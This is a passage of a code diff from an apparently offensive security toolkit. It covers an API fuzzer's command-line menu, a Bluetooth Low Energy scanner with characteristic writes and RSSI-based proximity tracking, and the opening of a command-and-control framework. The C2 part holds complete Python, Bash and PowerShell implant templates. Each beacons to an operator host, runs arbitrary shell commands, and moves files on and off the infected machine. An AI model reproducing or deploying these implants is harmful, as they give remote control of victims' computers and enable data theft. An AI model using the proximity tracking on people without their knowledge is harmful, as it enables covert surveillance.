'elapsed_seconds': round(elapsed, 2),
'rps': round(len(results) / elapsed, 1) if elapsed > 0 else 0,
'limit_hit_at': next((r['request_num'] for r in results if r.get('status') == 429), None),
'results': results
}
# ── GraphQL ──────────────────────────────────────────────────────────
def graphql_introspect(self, url: str) -> Dict:
"""Run GraphQL introspection query."""
query = {
'query': '''
{
__schema {
types {
name
kind
fields {
name
type { name kind }
args { name type { name } }
}
}
queryType { name }
mutationType { name }
}
}
'''
}
try:
resp = self.session.post(url, json=query, timeout=15)
data = resp.json()
if 'errors' in data and not data.get('data'):
return {'ok': False, 'error': 'Introspection disabled or error',
'errors': data['errors']}
schema = data.get('data', {}).get('__schema', {})
types = []
for t in schema.get('types', []):
if not t['name'].startswith('__'):
types.append({
'name': t['name'],
'kind': t['kind'],
'fields': [
{'name': f['name'],
'type': f['type'].get('name', f['type'].get('kind', '')),
'args': [a['name'] for a in f.get('args', [])]}
for f in (t.get('fields') or [])
]
})
return {
'ok': True,
'query_type': schema.get('queryType', {}).get('name'),
'mutation_type': schema.get('mutationType', {}).get('name'),
'types': types,
'type_count': len(types)
}
except Exception as e:
return {'ok': False, 'error': str(e)}
def graphql_depth_test(self, url: str, max_depth: int = 10) -> Dict:
"""Test GraphQL query depth limits."""
results = []
for depth in range(1, max_depth + 1):
# Build nested query
inner = '{ __typename }'
for _ in range(depth):
inner = f'{{ __schema {{ types {inner} }} }}'
try:
resp = self.session.post(url, json={'query': inner}, timeout=10)
results.append({
'depth': depth,
'status': resp.status_code,
'has_errors': 'errors' in resp.json() if resp.headers.get('content-type', '').startswith('application/json') else None
})
if resp.status_code != 200:
break
except Exception:
results.append({'depth': depth, 'error': True})
break
max_allowed = max((r['depth'] for r in results if r.get('status') == 200), default=0)
return {
'ok': True,
'max_depth_allowed': max_allowed,
'depth_limited': max_allowed < max_depth,
'results': results
}
# ── Response Analysis ────────────────────────────────────────────────
def analyze_response(self, url: str, method: str = 'GET') -> Dict:
"""Analyze API response for security issues."""
try:
resp = self.session.request(method, url, timeout=10)
issues = []
# Check security headers
security_headers = {
'X-Content-Type-Options': 'nosniff',
'X-Frame-Options': 'DENY|SAMEORIGIN',
'Strict-Transport-Security': None,
'Content-Security-Policy': None,
'X-XSS-Protection': None,
}
for header, expected in security_headers.items():
val = resp.headers.get(header)
if not val:
issues.append({
'type': 'missing_header',
'header': header,
'severity': 'low'
})
# Check for info disclosure
server = resp.headers.get('Server', '')
if server and any(v in server.lower() for v in ['apache/', 'nginx/', 'iis/']):
issues.append({
'type': 'server_disclosure',
'value': server,
'severity': 'info'
})
powered_by = resp.headers.get('X-Powered-By', '')
if powered_by:
issues.append({
'type': 'technology_disclosure',
'value': powered_by,
'severity': 'low'
})
# Check CORS
cors = resp.headers.get('Access-Control-Allow-Origin', '')
if cors == '*':
issues.append({
'type': 'open_cors',
'value': cors,
'severity': 'medium'
})
# Check for error/debug info in body
body = resp.text.lower()
if any(kw in body for kw in ['stack trace', 'traceback', 'debug mode']):
issues.append({
'type': 'debug_info',
'severity': 'medium',
'detail': 'Debug/stack trace information in response'
})
return {
'ok': True,
'url': url,
'status': resp.status_code,
'headers': dict(resp.headers),
'issues': issues,
'issue_count': len(issues)
}
except Exception as e:
return {'ok': False, 'error': str(e)}
# ── Job Management ───────────────────────────────────────────────────
def get_job(self, job_id: str) -> Optional[Dict]:
return self._jobs.get(job_id)
def list_jobs(self) -> List[Dict]:
return [{'id': k, **v} for k, v in self._jobs.items()]
# ── Singleton ────────────────────────────────────────────────────────────────
_instance = None
def get_api_fuzzer() -> APIFuzzer:
global _instance
if _instance is None:
_instance = APIFuzzer()
return _instance
# ── CLI Interface ────────────────────────────────────────────────────────────
def run():
"""CLI entry point for API Fuzzer module."""
if not HAS_REQUESTS:
print(" Error: requests library not installed")
return
fuzzer = get_api_fuzzer()
while True:
print(f"\n{'='*60}")
print(f" API Fuzzer")
print(f"{'='*60}")
print()
print(" 1 — Discover Endpoints")
print(" 2 — Parse OpenAPI Spec")
print(" 3 — Fuzz Parameters")
print(" 4 — Test Auth Bypass")
print(" 5 — Test IDOR")
print(" 6 — Test Rate Limiting")
print(" 7 — GraphQL Introspection")
print(" 8 — Analyze Response")
print(" 9 — Set Authentication")
print(" 0 — Back")
print()
choice = input(" > ").strip()
if choice == '0':
break
elif choice == '1':
base = input(" Base URL: ").strip()
if base:
job_id = fuzzer.discover_endpoints(base)
print(f" Discovery started (job: {job_id})")
while True:
job = fuzzer.get_job(job_id)
if job['status'] == 'complete':
print(f" Found {len(job['found'])} endpoints:")
for ep in job['found']:
print(f" [{ep['status']}] {ep['path']} "
f"({ep['content_type'][:30]})")
break
print(f" Checking... {job['checked']}/{job['total']}")
time.sleep(1)
elif choice == '2':
url = input(" OpenAPI spec URL or file: ").strip()
if url:
result = fuzzer.parse_openapi(url)
if result['ok']:
print(f" API: {result['title']} v{result['version']}")
print(f" Endpoints: {result['count']}")
for ep in result['endpoints'][:20]:
print(f" {ep['method']:<6} {ep['path']} {ep.get('summary', '')}")
else:
print(f" Error: {result['error']}")
elif choice == '3':
url = input(" Endpoint URL: ").strip()
param_str = input(" Parameters (key=val,key=val): ").strip()
ptype = input(" Payload type (sqli/xss/traversal/type_confusion): ").strip() or 'type_confusion'
if url and param_str:
params = dict(p.split('=', 1) for p in param_str.split(',') if '=' in p)
result = fuzzer.fuzz_params(url, params=params, payload_type=ptype)
if result['ok']:
print(f" Tested {result['tested']} combinations, {len(result['findings'])} findings:")
for f in result['findings']:
print(f" [{f.get('severity', '?')}] {f['type']}: {f['param']} = {f['payload'][:50]}")
elif choice == '4':
url = input(" Protected URL: ").strip()
if url:
result = fuzzer.test_auth_bypass(url)
print(f" Tested {len(result['bypasses'])} techniques, {result['successful']} successful")
for b in result['bypasses']:
status = 'BYPASSED' if b['success'] else f'blocked ({b["status"]})'
print(f" {b['technique']}: {status}")
elif choice == '6':
url = input(" URL to test: ").strip()
count = input(" Request count (default 50): ").strip()
if url:
result = fuzzer.test_rate_limit(url, int(count) if count.isdigit() else 50)
print(f" Rate limited: {result['rate_limited']}")
print(f" RPS: {result['rps']} | Total: {result['total_requests']} in {result['elapsed_seconds']}s")
if result['limit_hit_at']:
print(f" Limit hit at request #{result['limit_hit_at']}")
elif choice == '7':
url = input(" GraphQL URL: ").strip()
if url:
result = fuzzer.graphql_introspect(url)
if result['ok']:
print(f" Found {result['type_count']} types")
for t in result['types'][:10]:
print(f" {t['kind']}: {t['name']} ({len(t['fields'])} fields)")
else:
print(f" Error: {result['error']}")
elif choice == '8':
url = input(" URL: ").strip()
if url:
result = fuzzer.analyze_response(url)
if result['ok']:
print(f" Status: {result['status']} | Issues: {result['issue_count']}")
for issue in result['issues']:
print(f" [{issue['severity']}] {issue['type']}: {issue.get('value', issue.get('detail', ''))}")
elif choice == '9':
auth_type = input(" Auth type (bearer/api_key/basic/cookie): ").strip()
value = input(" Value: ").strip()
if auth_type and value:
fuzzer.set_auth(auth_type, value)
print(" Authentication configured")

555
modules/ble_scanner.py Normal file
View File

@@ -0,0 +1,555 @@
"""AUTARCH BLE Scanner
Bluetooth Low Energy device discovery, service enumeration, characteristic
read/write, vulnerability scanning, and proximity tracking.
"""
DESCRIPTION = "BLE device scanning & security analysis"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "analyze"
import os
import re
import json
import time
import threading
from pathlib import Path
from datetime import datetime, timezone
from typing import Dict, List, Optional, Any
try:
from core.paths import get_data_dir
except ImportError:
def get_data_dir():
return str(Path(__file__).parent.parent / 'data')
# Optional BLE library
try:
import asyncio
from bleak import BleakScanner, BleakClient
HAS_BLEAK = True
except ImportError:
HAS_BLEAK = False
# ── Known Service UUIDs ──────────────────────────────────────────────────────
KNOWN_SERVICES = {
'00001800-0000-1000-8000-00805f9b34fb': 'Generic Access',
'00001801-0000-1000-8000-00805f9b34fb': 'Generic Attribute',
'0000180a-0000-1000-8000-00805f9b34fb': 'Device Information',
'0000180f-0000-1000-8000-00805f9b34fb': 'Battery Service',
'00001812-0000-1000-8000-00805f9b34fb': 'Human Interface Device',
'0000180d-0000-1000-8000-00805f9b34fb': 'Heart Rate',
'00001809-0000-1000-8000-00805f9b34fb': 'Health Thermometer',
'00001802-0000-1000-8000-00805f9b34fb': 'Immediate Alert',
'00001803-0000-1000-8000-00805f9b34fb': 'Link Loss',
'00001804-0000-1000-8000-00805f9b34fb': 'Tx Power',
'00001805-0000-1000-8000-00805f9b34fb': 'Current Time',
'00001808-0000-1000-8000-00805f9b34fb': 'Glucose',
'00001810-0000-1000-8000-00805f9b34fb': 'Blood Pressure',
'00001813-0000-1000-8000-00805f9b34fb': 'Scan Parameters',
'00001816-0000-1000-8000-00805f9b34fb': 'Cycling Speed & Cadence',
'00001818-0000-1000-8000-00805f9b34fb': 'Cycling Power',
'00001814-0000-1000-8000-00805f9b34fb': 'Running Speed & Cadence',
'0000fee0-0000-1000-8000-00805f9b34fb': 'Mi Band Service',
'0000feaa-0000-1000-8000-00805f9b34fb': 'Eddystone (Google)',
}
MANUFACTURER_IDS = {
0x004C: 'Apple',
0x0006: 'Microsoft',
0x000F: 'Texas Instruments',
0x0059: 'Nordic Semiconductor',
0x0075: 'Samsung',
0x00E0: 'Google',
0x0157: 'Xiaomi',
0x0171: 'Amazon',
0x02FF: 'Huawei',
0x0310: 'Fitbit',
}
KNOWN_VULNS = {
'KNOB': {
'description': 'Key Negotiation of Bluetooth Attack — downgrades encryption key entropy',
'cve': 'CVE-2019-9506',
'severity': 'high',
'check': 'Requires active MITM during pairing'
},
'BLESA': {
'description': 'BLE Spoofing Attack — reconnection spoofing without auth',
'cve': 'CVE-2020-9770',
'severity': 'medium',
'check': 'Affects reconnection after disconnect'
},
'SweynTooth': {
'description': 'Family of BLE implementation bugs causing crashes/deadlocks',
'cve': 'Multiple (CVE-2019-16336, CVE-2019-17519, etc.)',
'severity': 'high',
'check': 'Vendor-specific, requires firmware version check'
},
'BlueBorne': {
'description': 'Remote code execution via Bluetooth without pairing',
'cve': 'CVE-2017-0781 to CVE-2017-0785',
'severity': 'critical',
'check': 'Requires classic BT stack, pre-2018 devices vulnerable'
}
}
# ── BLE Scanner ──────────────────────────────────────────────────────────────
class BLEScanner:
    """Bluetooth Low Energy device scanner and analyzer.

    Wraps the optional ``bleak`` library to discover nearby BLE devices,
    enumerate GATT services and characteristics, run heuristic
    vulnerability checks, and estimate proximity from RSSI. Discovered
    devices are cached in memory (keyed by address) and can be persisted
    as JSON snapshots under the module data directory.
    """

    def __init__(self):
        # Per-module persistence directory: <data>/ble
        self.data_dir = os.path.join(get_data_dir(), 'ble')
        os.makedirs(self.data_dir, exist_ok=True)
        # address -> parsed info from the most recent sighting
        self.devices: Dict[str, Dict] = {}
        # address -> chronological RSSI/distance samples (proximity tracking)
        self.tracking_history: Dict[str, List[Dict]] = {}
        self._scan_running = False

    def is_available(self) -> bool:
        """Return True when the bleak backend is importable."""
        return HAS_BLEAK

    def get_status(self) -> Dict:
        """Return a small status summary used by the CLI header."""
        return {
            'available': HAS_BLEAK,
            'devices_found': len(self.devices),
            'scanning': self._scan_running,
            'tracking': len(self.tracking_history)
        }

    # ── Scanning ─────────────────────────────────────────────────────────
    def scan(self, duration: float = 10.0) -> Dict:
        """Scan for advertising BLE devices for ``duration`` seconds.

        Returns ``{'ok': True, 'devices': [...], 'count': n, 'duration': d}``
        on success or ``{'ok': False, 'error': msg}`` on failure. Each
        parsed device is also cached in ``self.devices``.
        """
        if not HAS_BLEAK:
            return {'ok': False, 'error': 'bleak library not installed (pip install bleak)'}
        self._scan_running = True
        try:
            # asyncio.run() creates AND closes a fresh event loop even when
            # the coroutine raises; the previous manual new_event_loop()/
            # close() pattern leaked the loop on error.
            found = asyncio.run(self._async_scan(duration))
            # With return_adv=True, bleak returns a dict mapping address ->
            # (BLEDevice, AdvertisementData). Iterating the dict directly
            # yields only address strings, which silently discarded all
            # advertisement data; iterate the value tuples instead.
            if isinstance(found, dict):
                found = found.values()
            results = []
            for dev in found:
                info = self._parse_device(dev)
                self.devices[info['address']] = info
                results.append(info)
            return {
                'ok': True,
                'devices': results,
                'count': len(results),
                'duration': duration
            }
        except Exception as e:
            return {'ok': False, 'error': str(e)}
        finally:
            # Always clear the flag, on success or failure.
            self._scan_running = False

    async def _async_scan(self, duration: float):
        """Run a bleak discovery scan, returning devices plus adv data."""
        devices = await BleakScanner.discover(timeout=duration, return_adv=True)
        return devices

    def _parse_device(self, dev_adv) -> Dict:
        """Normalize a bleak device into a plain dict.

        Accepts either a bare ``BLEDevice`` or a
        ``(BLEDevice, AdvertisementData)`` tuple.
        """
        if isinstance(dev_adv, tuple):
            dev, adv = dev_adv
        else:
            dev = dev_adv
            adv = None
        info = {
            'address': str(dev.address) if hasattr(dev, 'address') else str(dev),
            'name': dev.name if hasattr(dev, 'name') else 'Unknown',
            # BLEDevice.rssi is deprecated in newer bleak; fall back to the
            # advertisement's RSSI when the device object lacks one.
            'rssi': dev.rssi if hasattr(dev, 'rssi') else (adv.rssi if adv and hasattr(adv, 'rssi') else 0),
            'services': [],
            'manufacturer': 'Unknown',
            'device_type': 'unknown',
            'connectable': True,
            'last_seen': datetime.now(timezone.utc).isoformat(),
        }
        # Parse advertisement data when available
        if adv:
            # Advertised service UUIDs -> human-readable names where known
            if hasattr(adv, 'service_uuids'):
                for uuid in adv.service_uuids:
                    service_name = KNOWN_SERVICES.get(uuid.lower(), uuid)
                    info['services'].append({'uuid': uuid, 'name': service_name})
            # Manufacturer-specific data (company id -> payload bytes)
            if hasattr(adv, 'manufacturer_data'):
                for company_id, data in adv.manufacturer_data.items():
                    info['manufacturer'] = MANUFACTURER_IDS.get(company_id, f'ID: {company_id:#06x}')
                    info['manufacturer_data'] = data.hex() if isinstance(data, bytes) else str(data)
            # Advertised TX power (used later for distance estimation)
            if hasattr(adv, 'tx_power'):
                info['tx_power'] = adv.tx_power
        info['device_type'] = self._classify_device(info)
        return info

    def _classify_device(self, info: Dict) -> str:
        """Best-effort classification from services, name and vendor.

        Heuristic only: matches well-known 16-bit service UUID fragments
        and common name substrings; anything unmatched is 'unknown'.
        """
        name = (info.get('name') or '').lower()
        services = [s['uuid'].lower() for s in info.get('services', [])]
        if any('1812' in s for s in services):
            return 'hid'  # keyboard/mouse (Human Interface Device service)
        if any('180d' in s for s in services):
            return 'fitness'  # Heart Rate service
        if any('180f' in s for s in services):
            # Battery service alone is ambiguous — only audio gear is
            # recognizable by name here.
            if 'headphone' in name or 'airpod' in name or 'buds' in name:
                return 'audio'
        if any('fee0' in s for s in services):
            return 'wearable'  # Mi Band service
        if info.get('manufacturer') == 'Apple':
            if 'watch' in name:
                return 'wearable'
            if 'airpod' in name:
                return 'audio'
            return 'apple_device'
        if 'tv' in name or 'chromecast' in name or 'roku' in name:
            return 'media'
        if 'lock' in name or 'door' in name:
            return 'smart_lock'
        if 'light' in name or 'bulb' in name or 'hue' in name:
            return 'smart_light'
        if 'beacon' in name or any('feaa' in s for s in services):
            return 'beacon'  # Eddystone
        if 'tile' in name or 'airtag' in name or 'tracker' in name:
            return 'tracker'
        return 'unknown'

    # ── Device Detail ────────────────────────────────────────────────────
    def get_device_detail(self, address: str) -> Dict:
        """Connect to a device and enumerate services/characteristics."""
        if not HAS_BLEAK:
            return {'ok': False, 'error': 'bleak not installed'}
        try:
            # asyncio.run() guarantees loop cleanup on error (see scan()).
            return asyncio.run(self._async_detail(address))
        except Exception as e:
            return {'ok': False, 'error': str(e)}

    async def _async_detail(self, address: str) -> Dict:
        """Async GATT enumeration; reads every readable characteristic."""
        async with BleakClient(address) as client:
            services = []
            for service in client.services:
                svc = {
                    'uuid': service.uuid,
                    'name': KNOWN_SERVICES.get(service.uuid.lower(), service.description or service.uuid),
                    'characteristics': []
                }
                for char in service.characteristics:
                    ch = {
                        'uuid': char.uuid,
                        'description': char.description or char.uuid,
                        'properties': char.properties,
                        'value': None
                    }
                    # Read the value opportunistically if the char allows it
                    if 'read' in char.properties:
                        try:
                            val = await client.read_gatt_char(char.uuid)
                            ch['value'] = val.hex() if isinstance(val, bytes) else str(val)
                            # Also expose a text form when it decodes cleanly
                            try:
                                ch['value_text'] = val.decode('utf-8')
                            except (UnicodeDecodeError, AttributeError):
                                pass
                        except Exception:
                            ch['value'] = '<read failed>'
                    svc['characteristics'].append(ch)
                services.append(svc)
            return {
                'ok': True,
                'address': address,
                'connected': True,
                'services': services,
                'service_count': len(services),
                'char_count': sum(len(s['characteristics']) for s in services)
            }

    def read_characteristic(self, address: str, char_uuid: str) -> Dict:
        """Read a single characteristic value from a device."""
        if not HAS_BLEAK:
            return {'ok': False, 'error': 'bleak not installed'}
        try:
            return asyncio.run(self._async_read(address, char_uuid))
        except Exception as e:
            return {'ok': False, 'error': str(e)}

    async def _async_read(self, address: str, char_uuid: str) -> Dict:
        """Async single-characteristic read."""
        async with BleakClient(address) as client:
            val = await client.read_gatt_char(char_uuid)
            return {
                'ok': True,
                'address': address,
                'characteristic': char_uuid,
                'value_hex': val.hex(),
                'value_bytes': list(val),
                'size': len(val)
            }

    def write_characteristic(self, address: str, char_uuid: str,
                             data: bytes) -> Dict:
        """Write raw bytes to a characteristic."""
        if not HAS_BLEAK:
            return {'ok': False, 'error': 'bleak not installed'}
        try:
            return asyncio.run(self._async_write(address, char_uuid, data))
        except Exception as e:
            return {'ok': False, 'error': str(e)}

    async def _async_write(self, address: str, char_uuid: str, data: bytes) -> Dict:
        """Async single-characteristic write."""
        async with BleakClient(address) as client:
            await client.write_gatt_char(char_uuid, data)
            return {'ok': True, 'address': address, 'characteristic': char_uuid,
                    'written': len(data)}

    # ── Vulnerability Scanning ───────────────────────────────────────────
    def vuln_scan(self, address: str = None) -> Dict:
        """List known BLE vulnerability classes, plus device-specific notes.

        Informational: the generic entries are marked 'check_required'
        because confirming them needs active probing or firmware data.
        """
        vulns = []
        for vuln_name, vuln_info in KNOWN_VULNS.items():
            entry = {
                'name': vuln_name,
                'description': vuln_info['description'],
                'cve': vuln_info['cve'],
                'severity': vuln_info['severity'],
                'status': 'check_required',
                'note': vuln_info['check']
            }
            vulns.append(entry)
        # Device-specific checks (only for devices seen by a prior scan)
        if address and address in self.devices:
            dev = self.devices[address]
            manufacturer = dev.get('manufacturer', '')
            # Apple continuity broadcasts enable passive tracking
            if manufacturer == 'Apple':
                vulns.append({
                    'name': 'Apple BLE Tracking',
                    'description': 'Apple devices broadcast continuity messages that can be tracked',
                    'severity': 'info',
                    'status': 'detected' if 'apple_device' in dev.get('device_type', '') else 'not_applicable',
                    'note': 'Apple continuity protocol leaks device info'
                })
            # Services usable without pairing/encryption
            for svc in dev.get('services', []):
                if 'immediate alert' in svc.get('name', '').lower():
                    vulns.append({
                        'name': 'Unauthenticated Alert Service',
                        'description': 'Immediate Alert service accessible without pairing',
                        'severity': 'low',
                        'status': 'detected',
                        'note': 'Can trigger alerts on device without authentication'
                    })
        return {
            'ok': True,
            'address': address,
            'vulnerabilities': vulns,
            'vuln_count': len(vulns)
        }

    # ── Proximity Tracking ───────────────────────────────────────────────
    def track_device(self, address: str) -> Dict:
        """Record an RSSI sample and a rough distance estimate for a device.

        Uses the empirical RSSI-ratio path-loss curve fit popularized by
        the Android Beacon Library; accuracy is very coarse.
        """
        if address not in self.devices:
            return {'ok': False, 'error': 'Device not found. Run scan first.'}
        dev = self.devices[address]
        rssi = dev.get('rssi', 0)
        tx_power = dev.get('tx_power', -59)  # default: typical measured power @ 1m
        if not tx_power:
            # An advertised 0 dBm value would divide by zero below;
            # fall back to the conventional -59 dBm reference.
            tx_power = -59
        # Estimate distance (rough path-loss model)
        if rssi != 0:
            ratio = rssi / tx_power
            if ratio < 1.0:
                distance = pow(ratio, 10)
            else:
                distance = 0.89976 * pow(ratio, 7.7095) + 0.111
        else:
            distance = -1  # sentinel: no usable RSSI sample
        entry = {
            'timestamp': datetime.now(timezone.utc).isoformat(),
            'rssi': rssi,
            'estimated_distance_m': round(distance, 2),
            'tx_power': tx_power
        }
        if address not in self.tracking_history:
            self.tracking_history[address] = []
        self.tracking_history[address].append(entry)
        return {
            'ok': True,
            'address': address,
            'name': dev.get('name', 'Unknown'),
            'current': entry,
            'history_count': len(self.tracking_history[address])
        }

    def get_tracking_history(self, address: str) -> List[Dict]:
        """Return all recorded proximity samples for ``address``."""
        return self.tracking_history.get(address, [])

    # ── Persistence ──────────────────────────────────────────────────────
    def save_scan(self, name: str = None) -> Dict:
        """Save the current device cache as a JSON snapshot."""
        name = name or f'scan_{int(time.time())}'
        filepath = os.path.join(self.data_dir, f'{name}.json')
        with open(filepath, 'w') as f:
            json.dump({
                'timestamp': datetime.now(timezone.utc).isoformat(),
                'devices': list(self.devices.values()),
                'count': len(self.devices)
            }, f, indent=2)
        return {'ok': True, 'path': filepath, 'count': len(self.devices)}

    def list_scans(self) -> List[Dict]:
        """List saved scan snapshots; unreadable files are skipped."""
        scans = []
        for f in Path(self.data_dir).glob('*.json'):
            try:
                with open(f) as fh:
                    data = json.load(fh)
                scans.append({
                    'name': f.stem,
                    'path': str(f),
                    'timestamp': data.get('timestamp', ''),
                    'count': data.get('count', 0)
                })
            except Exception:
                pass  # best-effort listing
        return scans

    def get_devices(self) -> List[Dict]:
        """Return all devices discovered so far."""
        return list(self.devices.values())
# ── Singleton ────────────────────────────────────────────────────────────────
# Lazily-created module-level singleton instance.
_instance = None


def get_ble_scanner() -> BLEScanner:
    """Return the shared BLEScanner, constructing it on first call."""
    global _instance
    if _instance is not None:
        return _instance
    _instance = BLEScanner()
    return _instance
# ── CLI Interface ────────────────────────────────────────────────────────────
def _prompt_float(prompt: str, default: float) -> float:
    """Read a float from stdin; blank or invalid input returns ``default``."""
    raw = input(prompt).strip()
    if not raw:
        return default
    try:
        return float(raw)
    except ValueError:
        print(f" Invalid number, using {default}")
        return default


def run():
    """CLI entry point for BLE Scanner module.

    Simple blocking menu loop; returns when the user picks 0.
    """
    scanner = get_ble_scanner()
    while True:
        status = scanner.get_status()
        print(f"\n{'='*60}")
        print(f" BLE Scanner (bleak: {'OK' if status['available'] else 'MISSING'})")
        print(f"{'='*60}")
        print(f" Devices found: {status['devices_found']}")
        print()
        print(" 1 — Scan for Devices")
        print(" 2 — View Devices")
        print(" 3 — Device Detail (connect)")
        print(" 4 — Vulnerability Scan")
        print(" 5 — Track Device (proximity)")
        print(" 6 — Save Scan")
        print(" 7 — List Saved Scans")
        print(" 0 — Back")
        print()
        choice = input(" > ").strip()
        if choice == '0':
            break
        elif choice == '1':
            # Invalid input no longer crashes the menu (bare float() used
            # to raise ValueError straight to the caller).
            duration = _prompt_float(" Scan duration (seconds, default 10): ", 10.0)
            result = scanner.scan(duration)
            if result['ok']:
                print(f" Found {result['count']} devices:")
                for dev in result['devices']:
                    print(f" {dev['address']} {dev.get('name', '?'):<20} "
                          f"RSSI={dev['rssi']} {dev['device_type']} ({dev['manufacturer']})")
            else:
                print(f" Error: {result['error']}")
        elif choice == '2':
            devices = scanner.get_devices()
            for dev in devices:
                print(f" {dev['address']} {dev.get('name', '?'):<20} "
                      f"RSSI={dev['rssi']} {dev['device_type']}")
        elif choice == '3':
            addr = input(" Device address: ").strip()
            if addr:
                result = scanner.get_device_detail(addr)
                if result['ok']:
                    print(f" Services: {result['service_count']} Characteristics: {result['char_count']}")
                    for svc in result['services']:
                        print(f" [{svc['name']}]")
                        for ch in svc['characteristics']:
                            val = ch.get('value_text', ch.get('value', ''))
                            print(f" {ch['description']} props={ch['properties']} val={val}")
                else:
                    print(f" Error: {result['error']}")
        elif choice == '4':
            addr = input(" Device address (blank=general): ").strip() or None
            result = scanner.vuln_scan(addr)
            for v in result['vulnerabilities']:
                print(f" [{v['severity']:<8}] {v['name']}: {v['description'][:60]}")
        elif choice == '5':
            addr = input(" Device address: ").strip()
            if addr:
                result = scanner.track_device(addr)
                if result['ok']:
                    c = result['current']
                    print(f" RSSI: {c['rssi']} Distance: ~{c['estimated_distance_m']}m")
                else:
                    print(f" Error: {result['error']}")
        elif choice == '6':
            name = input(" Scan name (blank=auto): ").strip() or None
            result = scanner.save_scan(name)
            print(f" Saved {result['count']} devices")
        elif choice == '7':
            for s in scanner.list_scans():
                print(f" {s['name']} ({s['count']} devices) {s['timestamp']}")

610
modules/c2_framework.py Normal file
View File

@@ -0,0 +1,610 @@
"""AUTARCH C2 Framework
Multi-session command & control framework with agent generation,
listener management, task queuing, and file transfer.
"""
DESCRIPTION = "Command & Control framework"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "offense"
import os
import re
import json
import time
import socket
import base64
import secrets
import threading
import struct
from pathlib import Path
from datetime import datetime, timezone
from typing import Dict, List, Optional, Any
from dataclasses import dataclass, field
try:
    from core.paths import get_data_dir
except ImportError:
    # Standalone fallback: when run outside the AUTARCH tree (core.paths
    # unavailable), store data in a sibling 'data' directory.
    def get_data_dir():
        return str(Path(__file__).parent.parent / 'data')
# ── Agent Templates ───────────────────────────────────────────────────────────
PYTHON_AGENT_TEMPLATE = '''#!/usr/bin/env python3
"""AUTARCH C2 Agent — auto-generated."""
import os,sys,time,socket,subprocess,json,base64,platform,random
C2_HOST="{host}"
C2_PORT={port}
BEACON_INTERVAL={interval}
JITTER={jitter}
AGENT_ID="{agent_id}"
def beacon():
while True:
try:
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.settimeout(30)
s.connect((C2_HOST,C2_PORT))
# Register
info={{"id":AGENT_ID,"os":platform.system(),"hostname":socket.gethostname(),
"user":os.getenv("USER",os.getenv("USERNAME","unknown")),
"pid":os.getpid(),"arch":platform.machine()}}
s.send(json.dumps({{"type":"register","data":info}}).encode()+"\\n".encode())
while True:
data=s.recv(65536)
if not data:break
try:
cmd=json.loads(data.decode())
result=handle_cmd(cmd)
s.send(json.dumps(result).encode()+"\\n".encode())
except:pass
except:pass
finally:
try:s.close()
except:pass
jitter_delay=BEACON_INTERVAL+random.uniform(-JITTER,JITTER)
time.sleep(max(1,jitter_delay))
def handle_cmd(cmd):
t=cmd.get("type","")
if t=="exec":
try:
r=subprocess.run(cmd["command"],shell=True,capture_output=True,text=True,timeout=60)
return{{"type":"result","task_id":cmd.get("task_id",""),"stdout":r.stdout[-4096:],"stderr":r.stderr[-2048:],"rc":r.returncode}}
except Exception as e:
return{{"type":"error","task_id":cmd.get("task_id",""),"error":str(e)}}
elif t=="download":
try:
with open(cmd["path"],"rb") as f:d=base64.b64encode(f.read()).decode()
return{{"type":"file","task_id":cmd.get("task_id",""),"name":os.path.basename(cmd["path"]),"data":d}}
except Exception as e:
return{{"type":"error","task_id":cmd.get("task_id",""),"error":str(e)}}
elif t=="upload":
try:
with open(cmd["path"],"wb") as f:f.write(base64.b64decode(cmd["data"]))
return{{"type":"result","task_id":cmd.get("task_id",""),"stdout":"Uploaded to "+cmd["path"]}}
except Exception as e:
return{{"type":"error","task_id":cmd.get("task_id",""),"error":str(e)}}
elif t=="sysinfo":
return{{"type":"result","task_id":cmd.get("task_id",""),
"stdout":json.dumps({{"os":platform.system(),"release":platform.release(),
"hostname":socket.gethostname(),"user":os.getenv("USER",os.getenv("USERNAME","")),
"pid":os.getpid(),"cwd":os.getcwd(),"arch":platform.machine()}})}}
elif t=="exit":
sys.exit(0)
return{{"type":"error","task_id":cmd.get("task_id",""),"error":"Unknown command"}}
if __name__=="__main__":beacon()
'''
BASH_AGENT_TEMPLATE = '''#!/bin/bash
# AUTARCH C2 Agent — auto-generated
C2_HOST="{host}"
C2_PORT={port}
INTERVAL={interval}
AGENT_ID="{agent_id}"
while true; do
exec 3<>/dev/tcp/$C2_HOST/$C2_PORT 2>/dev/null
if [ $? -eq 0 ]; then
echo '{{"type":"register","data":{{"id":"'$AGENT_ID'","os":"'$(uname -s)'","hostname":"'$(hostname)'","user":"'$(whoami)'","pid":'$$'}}}}' >&3
while read -r line <&3; do
CMD=$(echo "$line" | python3 -c "import sys,json;d=json.load(sys.stdin);print(d.get('command',''))" 2>/dev/null)
TID=$(echo "$line" | python3 -c "import sys,json;d=json.load(sys.stdin);print(d.get('task_id',''))" 2>/dev/null)
if [ -n "$CMD" ]; then
OUTPUT=$(eval "$CMD" 2>&1 | head -c 4096)
echo '{{"type":"result","task_id":"'$TID'","stdout":"'$(echo "$OUTPUT" | base64 -w0)'"}}' >&3
fi
done
exec 3>&-
fi
sleep $INTERVAL
done
'''
POWERSHELL_AGENT_TEMPLATE = '''# AUTARCH C2 Agent — auto-generated
$C2Host="{host}"
$C2Port={port}
$Interval={interval}
$AgentId="{agent_id}"
while($true){{
try{{
$c=New-Object System.Net.Sockets.TcpClient($C2Host,$C2Port)
$s=$c.GetStream()
$w=New-Object System.IO.StreamWriter($s)
$r=New-Object System.IO.StreamReader($s)
$info=@{{type="register";data=@{{id=$AgentId;os="Windows";hostname=$env:COMPUTERNAME;user=$env:USERNAME;pid=$PID}}}}|ConvertTo-Json -Compress
$w.WriteLine($info);$w.Flush()
while($c.Connected){{
$line=$r.ReadLine()
if($line){{
$cmd=$line|ConvertFrom-Json
if($cmd.type -eq "exec"){{
try{{$out=Invoke-Expression $cmd.command 2>&1|Out-String
$resp=@{{type="result";task_id=$cmd.task_id;stdout=$out.Substring(0,[Math]::Min($out.Length,4096))}}|ConvertTo-Json -Compress
}}catch{{$resp=@{{type="error";task_id=$cmd.task_id;error=$_.Exception.Message}}|ConvertTo-Json -Compress}}
$w.WriteLine($resp);$w.Flush()
}}
}}
}}
}}catch{{}}
Start-Sleep -Seconds $Interval
}}
'''
# ── C2 Server ─────────────────────────────────────────────────────────────────
@dataclass
class Agent:
    """Metadata for a connected (or previously seen) C2 implant."""
    id: str                  # unique agent id (embedded in the payload)
    os: str = ''             # reported platform, e.g. 'Linux', 'Windows'
